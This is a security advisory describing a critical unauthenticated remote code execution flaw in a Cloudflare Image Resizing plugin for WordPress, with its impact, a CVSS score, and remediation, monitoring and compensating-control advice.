A critical remote code execution (RCE) vulnerability has been identified in the Cloudflare Image Resizing plugin for WordPress. This flaw allows an unauthenticated attacker to execute arbitrary code on the server, potentially leading to a complete compromise of the affected website, data theft, and further network intrusion. Due to the ease of exploitation and severe impact, immediate remediation is required.

The vulnerability exists within the hook_rest_pre_dispatch() method of the plugin. This function, which is intended to handle REST API requests, fails to perform any authentication checks, allowing unauthenticated users to access it. Furthermore, the function does not properly sanitize user-supplied input, enabling an attacker to craft a malicious request that injects and executes arbitrary commands on the underlying server, resulting in a full system compromise.

This vulnerability is rated as critical severity with a CVSS score of 9.8. A successful exploit would grant an attacker complete control over the WordPress application and the web server itself. This could lead to severe business consequences, including the theft of sensitive customer data, financial information, or intellectual property; website defacement and reputational damage; and the use of the compromised server to launch further attacks against other internal systems or external targets.

Immediate Action: Update the Cloudflare Image Resizing plugin for WordPress to the latest version immediately. After patching, it is crucial to monitor for any signs of exploitation attempts by reviewing web server access logs and system logs for suspicious activity.

Proactive Monitoring: Security teams should actively monitor web server logs for unusual or malformed requests to the WordPress REST API endpoint (/wp-json/). Specifically, look for requests targeting the Cloudflare Image Resizing plugin's functionality that contain unexpected payloads or command syntax. Monitor server processes for unexpected child processes spawned by the web server user (e.g., www-data, apache).

Compensating Controls: If immediate patching is not feasible, implement a Web Application Firewall (WAF) with rules specifically designed to block the malicious request patterns targeting this vulnerability. Consider disabling or restricting access to the WordPress REST API if it is not essential for business operations until patching can be completed.

Public Exploit Available: false

This vulnerability represents an extreme risk to the organization. Given the critical 9.8 CVSS score and the potential for unauthenticated remote code execution, all instances of the affected Cloudflare Image Resizing plugin must be identified and patched immediately. This vulnerability should be treated as the highest priority for remediation. Although not currently listed on the CISA KEV catalog, its severity warrants an emergency response.